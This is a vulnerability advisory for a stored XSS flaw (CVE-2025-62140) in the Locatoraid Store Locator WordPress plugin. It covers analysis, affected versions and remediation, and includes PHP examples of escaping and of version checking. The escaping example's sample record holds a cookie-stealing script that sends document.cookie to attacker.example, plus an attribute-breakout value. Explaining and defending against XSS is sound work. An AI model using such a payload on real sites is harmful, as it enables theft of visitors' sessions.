CVE-2025-62140
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in plainware Locatoraid Store Locator locatoraid allows Stored XSS. This issue affects Locatoraid Store Locator: from n/a through <= 3.9.68.
Analysis
Stored cross-site scripting (XSS) in the plainware Locatoraid Store Locator WordPress plugin, versions up to and including 3.9.68, allows an attacker to plant script in content that the plugin later renders into pages viewed by other users. The flaw is in how the plugin neutralizes user-supplied input when generating page output (CWE-79), so a single stored payload fires for every visitor of the affected page. With an EPSS score of 0.01% and no active exploitation confirmed, this is a low-probability but persistent risk whose fix is a plugin update.
Technical Context
The vulnerability stems from improper neutralization of user input (CWE-79) in the Locatoraid Store Locator plugin, a WordPress extension used to display store location information. The plugin fails to adequately sanitize or escape user-supplied data before rendering it in HTML output, allowing attackers to embed arbitrary JavaScript that executes in the browser context of subsequent users viewing the affected content. This is a stored XSS variant: the malicious payload persists in the application database and affects all users who access the compromised data, unlike reflected XSS, which requires per-victim delivery. The advisory text does not identify which plugin input carries the payload or which user role is needed to store it, so those details should be taken from the Patchstack advisory rather than assumed.
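To make the CWE-79 pattern concrete, the following stand-alone PHP script (an added illustration, not code from Locatoraid or from the advisory) renders a constructed store record first with raw concatenation and then with context-appropriate escaping. The record fields, the payload and the template shapes are hypothetical; the only claim is the general one: stored data must be escaped for the exact output context (HTML text, attribute value, JavaScript literal) at render time.

```php
<?php
// Added example, not Locatoraid's code: one constructed store record rendered by
// a vulnerable template and by a hardened one.

declare(strict_types=1);

// Constructed sample record, as it might sit in the database after someone with
// store-editing rights saved it. Field names are an assumption.
$store = [
    'name'    => 'Main St Shop<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'address' => '1 Main St" onmouseover="alert(1)',
    'lat'     => 51.5,
    'lng'     => -0.12,
];

// Vulnerable pattern: database values concatenated straight into HTML and into
// an inline JavaScript object. Whatever was stored is emitted verbatim.
function render_vulnerable(array $store): string
{
    return '<div class="store" data-address="' . $store['address'] . '">'
         . '<h3>' . $store['name'] . '</h3>'
         . '</div>'
         . '<script>var store = {name: "' . $store['name'] . '", lat: ' . $store['lat'] . '};</script>';
}

// Hardened pattern: escape per output context. Inside WordPress the same roles
// are played by esc_html() for text nodes, esc_attr() for attribute values and
// wp_json_encode() for data handed to JavaScript; PHP built-ins are used here so
// the script runs without WordPress loaded.
function esc_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(array $store): string
{
    // JSON_HEX_* turns < > & ' " into \uXXXX escapes, so a stored "</script>"
    // cannot terminate the script element.
    $js = json_encode(
        ['name' => $store['name'], 'lat' => (float) $store['lat'], 'lng' => (float) $store['lng']],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return '<div class="store" data-address="' . esc_text($store['address']) . '">'
         . '<h3>' . esc_text($store['name']) . '</h3>'
         . '</div>'
         . '<script>var store = ' . $js . ';</script>';
}

// Cheap regression check: does the literal payload survive into the output?
function leaks_payload(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

echo "--- vulnerable ---\n", render_vulnerable($store), "\n\n";
echo "--- hardened ---\n", render_hardened($store), "\n\n";

$needle = '<script>document.location';
printf("vulnerable leaks payload: %s\n", leaks_payload(render_vulnerable($store), $needle) ? 'yes' : 'no');
printf("hardened leaks payload:   %s\n", leaks_payload(render_hardened($store), $needle) ? 'yes' : 'no');
```

Run it with `php render.php`. The vulnerable output contains the payload unchanged in three places (attribute, heading, script); the hardened output shows `&lt;script&gt;` in the HTML contexts and `\u003Cscript\u003E` inside the JSON, so the browser treats the stored text as data in every context. Note that the `address` value also breaks out of its attribute in the vulnerable template even though it contains no `<script>` tag, which is why escaping has to cover attribute contexts and not just tag characters.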
Affected Products
The plainware Locatoraid Store Locator WordPress plugin is affected in all versions from an unspecified baseline through version 3.9.68 inclusive. The plugin serves as a geolocation tool for WordPress sites to display store locations to visitors. Exact CPE information is not independently confirmed in the provided references, though the vulnerability is documented in the Patchstack vulnerability database under the WordPress plugin category.
Remediation
Upgrade the Locatoraid Store Locator plugin to a version newer than 3.9.68 immediately. Check the official WordPress plugin repository or the vendor's update mechanism for the latest patched release. If automatic plugin updates are enabled, the patch should be deployed automatically; otherwise, administrators should trigger the update manually from the WordPress admin (Dashboard → Updates, or Plugins → Installed Plugins). Until patching is complete, restrict plugin functionality or disable the plugin if it is not actively in use. Updating changes how the plugin escapes output but does not remove payloads already stored, so review existing store records for injected markup after patching. The vulnerability details and remediation guidance are available via the Patchstack advisory referenced in the vulnerability database.
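For fleets of sites where opening each dashboard is impractical, the installed version can be read from the plugin's main-file header and compared against the last affected release. The script below is an added example, not part of the advisory or of the plugin; the header sample is constructed, and the main-file path mentioned in the comment is an assumption about the plugin's layout.

```php
<?php
// Added example, not the plugin's code: decide from a WordPress plugin header
// whether the installed Locatoraid version is in the affected range (<= 3.9.68).

declare(strict_types=1);

const LAST_AFFECTED = '3.9.68';

// Read the "Version:" field the way WordPress reads plugin metadata: a
// "Key: value" line inside the leading comment block. Returns null if absent.
function plugin_header_version(string $pluginFileContents): ?string
{
    if (preg_match('/^[ \t\/*#@]*Version:\s*(.+?)\s*$/mi', $pluginFileContents, $m) !== 1) {
        return null;
    }
    return trim($m[1]);
}

// true when the version is within the affected range, false when it is newer,
// null when no version could be read (treat that as "check by hand").
function is_affected(?string $installed): ?bool
{
    if ($installed === null) {
        return null;
    }
    return version_compare($installed, LAST_AFFECTED, '<=');
}

// Constructed sample header. On a real site the contents would come from
// file_get_contents(WP_PLUGIN_DIR . '/locatoraid/locatoraid.php'); that
// file name is an assumption, not taken from the advisory.
$sample = <<<'HDR'
<?php
/*
Plugin Name: Locatoraid Store Locator
Version: 3.9.68
*/
HDR;

$cases = [
    '3.9.68' => $sample,
    '3.9.69' => str_replace('3.9.68', '3.9.69', $sample),
    '3.10.0' => str_replace('3.9.68', '3.10.0', $sample),
];

foreach ($cases as $label => $contents) {
    $state = is_affected(plugin_header_version($contents));
    printf("%-7s -> %s\n", $label,
        $state === null ? 'version unknown' : ($state ? 'AFFECTED, update' : 'outside affected range'));
}
```

The 3.10.0 case is the reason to use `version_compare()` rather than a string comparison: lexically "3.10.0" sorts before "3.9.68", but it is a later release and is correctly reported as outside the affected range. An unreadable header returns null rather than "not affected", so a site where the check cannot run is flagged for manual review instead of silently passing.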